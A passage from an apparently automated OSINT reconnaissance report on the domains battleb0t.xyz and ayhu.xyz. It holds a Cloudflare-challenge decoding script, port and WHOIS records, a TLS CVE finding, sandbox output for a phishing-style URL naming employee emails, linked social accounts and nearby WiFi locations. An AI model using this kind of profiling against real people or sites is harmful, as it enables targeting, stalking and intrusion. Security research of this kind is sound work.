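    # it agrees with `t` guards against pairing a form with the wrong script.
    tok = re.search(r'__cf_chl_f_tk=[^"&\s]*?-(\d{10})-', html)
    return {
        "zone": _opt("cZone", html),
        "type": _opt("cType", html),
        "ray": _opt("cRay", html),
        "url": _b64(_opt("ru", html)),
        "method": _b64(_opt("rm", html)),
        "user_agent": _b64(_opt("ra", html)),
        "issued_at": datetime.fromtimestamp(ts, tz=timezone.utc),
        "token_time_matches": bool(tok) and int(tok.group(1)) == int(ts),
    }


if __name__ == "__main__":
    for k, v in decode_challenge(CHALLENGE_HTML).items():
        print(f"{k:20} {v}")
```

The decoded context shows a GET for https://www.ayhu.xyz/ at 2023-05-12 02:54:23 UTC, three seconds after the `date` header Cloudflare returned in the Web Server row of this table, sent with a 2018-era Firefox 62 User-Agent. A stale User-Agent of that kind is exactly what bot management challenges, so any row on this page produced from a challenged fetch (the HTTP Headers row above shows the same `cf-mitigated: challenge` for lol.html) describes Cloudflare's edge, not the origin, and should be re-fetched with a current browser profile before it is used as evidence about the site.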
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2087 | 172.67.135.9 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | TF2 Backpack Examiner (Category: gaming)
http://www.tf2items.com/id/Battleb0t/ | Battleb0t |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | vsco (Category: social)
https://vsco.co/ayshoo/gallery | ayshoo |
| 2023-05-12 02:54:07 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::ac43:8709:80 | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:55:22 | Raw Data from RIRs | No | Google | 0 | 0 | 1 | 0 | None | {'webSearchUrl': u'https://www.google.com/search?q=site:battleb0t.xyz&aq=t&oe=utf-8&client=firefox-a&ie=utf-8&rls=org.mozilla%3Aen-US%3Aofficial', 'urls': ['https://battleb0t.xyz/']} | battleb0t.xyz |
| 2023-05-12 03:32:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.10:443 | 188.114.97.0/24 |
| 2023-05-12 02:49:17 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://generalatlantic.com/astehnkuhl@generalatlantic.com%20https://site.php', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fastehnkuhl%40generalatlantic.com%20https%3A%2F%2Fllink.to%2F%3Fu%3Dhttps%3A%2F%2Fdev.protektnet.com%2FMNU%2Fgeneralatlantic.com%2Fjdenig%40generalatlantic.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3f4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_3f4_IE_EarlyTabStart_0xe18_Mutex"\n "IsoScope_3f4_IESQMMUTEX_0_331"\n "IsoScope_3f4_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_3f4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n "IsoScope_3f4_ConnHashTable<1012>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1012"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': 
u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.43.150:443"\n "104.21.16.120:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "172.67.71.45:443"\n "142.251.32.35:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2019 Twitter, Inc." 
(Indicator: "twitter")\n "<a href="https://plus.google.com/107971784894043504000/" onclick="window.open(this.href);return false;"><i class="fa fa-google-plus"></i></a>" (Indicator: "plus.google.com")\n "<a href="https://twitter.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-twitter"></i></a>" (Indicator: "twitter")\n "<a href="https://www.facebook.com/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-facebook"></i></a>" (Indicator: "facebook.com")\n "<a href="https://www.linkedin.com/company/nexcess" onclick="window.open(this.href);return false;"><i class="fa fa-linkedin"></i></a>" (Indicator: "linkedin.com")\n "<a href="https://www.youtube.com/user/nexcessnet" onclick="window.open(this.href);return false;"><i class="fa fa-youtube"></i></a>" (Indicator: "youtube")\n "<p>Congrats on launching your new Website! Spread the good news: <a href="https://twitter.com/share" class="twitter-share-button" data-text="Just launched my new website with @Nexcess!" 
data-count="none">Tweet</a></p>" (Indicator: "twitter")\n "<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?\'http\':\'https\';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+\'://platform.twitter.com/widgets.js\';fjs.parentNode.insertBefore(js,fjs);}}(document, \'script\', \'twitter-wjs\');</script>" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar102F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1041.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab102E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1040.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "GJU2ZIBE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GJU2ZIBE.txt]- [targetUID: 00000000-00001012]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002472]\n "recaptcha__en_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "www.google_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DF50FE3D0FF9FC6B92.TMP" has type "data"- Location: [%TEMP%\\~DF50FE3D0FF9FC6B92.TMP]- [targetUID: 00000000-00001012]\n "_5CF2F181-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._52546023-C1A8-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "site_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "FTU5WTPF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FTU5WTPF.txt]- [targetUID: 00000000-00001012]\n "KFOmCnqEu92Fr1Mu4mxP_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. 
All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht"- [targetUID: N/A]\n "llink_1_.htm" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "_A79A7ACA-C1A9-11ED-AA3F-0800274CAE20_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "5EL6UQQZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5EL6UQQZ.txt]- [targetUID: 00000000-00002472]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-169', u'name': u'Found mail related domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed email domain:"!1,w)})},u).prototype.cr=function(){},u.prototype.xy=function(){this.mx.g().focus()},u.prototype.tt=function(w,z,u,r,e,z,y){return(r=((z=new a_((e=["api","payload",(u=void 0===u?"":u,y=["p",0,37],2)],f)[29](y[2],e[y[1]],e[1])+u),z.u).set(y[0],w),wx.y()).get(),z.u.set("k",v[7](16,e[2],r)),z&&z.u.set("id",z),z).tostring()},u).prototype.h1=function(){},u.prototype.ia=function(w,z){(((this.su[(z=["qu",30,"sq"],z)[0]](w),this).mx[z[0]](w),this).rr[z[0]](w),this)[z[2]][z[0]](w),this.bi[z[0]](w),v[z[1]](9," [Source: recaptcha__en_1_.js]\n Observed email 
domain:"z,u){(this[(((((td.prototype.sw[z=["undo-button-holder","image-button-holder","verify-button-holder"],u=["call",1,"sq"],u[0]](this,w),this.su).render(c[41](68,this,"reload-button-holder")),this.mx.render(c[41](52,this,"audio-button-holder")),this.rr).render(c[41](53,this,z[u[1]])),this.bi).render(c[41](84,this,"help-button-holder")),this.xv).render(c[41](68,this,z[0])),f[13](8,!1,this.xv.g()),u)[2]].render(c[41](68,this,z[2])),this).ee?f[13](22,!1,this.mx.g()):f[13](20,!1,this.rr.g())},u).prototype.nu=" [S | 185.199.110.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DaltonInt (Net ID: 00:0A:04:99:14:E2) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:54:21 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | http://vscode.battleb0t.xyz | vscode.battleb0t.xyz |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 133.97.148.34.bc.googleusercontent.com | 34.148.97.133 |
| 2023-05-12 02:54:20 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/css;charset=utf-8 | https://funny.battleb0t.xyz/gallery.css |
| 2023-05-12 02:46:50 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.148.97.127 |
| 2023-05-12 03:36:17 | Blacklisted IP on Same Subnet | Yes | DroneBL | 0 | 0 | 4 | 0 | None | dronebl.org - Brute force attackers (45.131.109.177) | 45.131.109.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | tom1 (Net ID: 00:06:25:9C:ED:D2) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:12:11 | Co-Hosted Site - Domain Whois | No | Whois | 2 | 0 | 3 | 0 | None | Domain Name: ACILACIKVETERINER.COM
Registry Domain ID: 2652209212_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2023-04-01T13:07:55Z
Creation Date: 2021-11-02T23:11:03Z
Registry Expiry Date: 2023-11-02T23:11:03Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: NSC1.KEYUBU.NET
Name Server: NSC2.KEYUBU.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:11:50Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ACILACIKVETERINER.COM
Registry Domain ID : 2652209212_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2023-04-01T12:50:32Z
Creation Date: 2021-11-02T23:11:03Z
Registrar Registration Expiration Date: 2023-11-02T23:11:03Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: Elazig
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=ACILACIKVETERINER.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: NSC1.KEYUBU.NET
Name Server: NSC2.KEYUBU.NET
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:00Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
| acilacikveteriner.com |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:DB:DC:87) | 40.2024, 29.0398 |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@godaddy.com | Domain Name: AMCODEV.ME
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2023-01-03T11:02:11Z
Creation Date: 2018-01-02T22:12:38Z
Registry Expiry Date: 2024-01-02T22:12:38Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Domain Name: amcodev.me
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2023-01-03T11:02:09Z
Creation Date: 2018-01-02T22:12:38Z
Registrar Registration Expiration Date: 2024-01-02T22:12:38Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR434510046
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Admin ID: CR434510262
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Tech ID: CR434510194
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:14:48 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | www.ayhu.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WSTOCK (Net ID: 00:1C:DF:E5:DC:4B) | 32.8608, -79.9746 |
| 2023-05-12 02:56:05 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'rfc822-email_part_001.html', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "152.199.4.44:443"\n "69.16.175.42:443"\n "142.251.33.106:443"\n "52.85.247.99:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"aadcdn.msftauth.net"\n "code.jquery.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', 
u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e20_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_e20_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e20_ConnHashTable<3616>_HashTable_Mutex"\n "IsoScope_e20_IESQMMUTEX_0_303"\n "IsoScope_e20_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_e20_IE_EarlyTabStart_0xc4c_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3616"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3616"\n 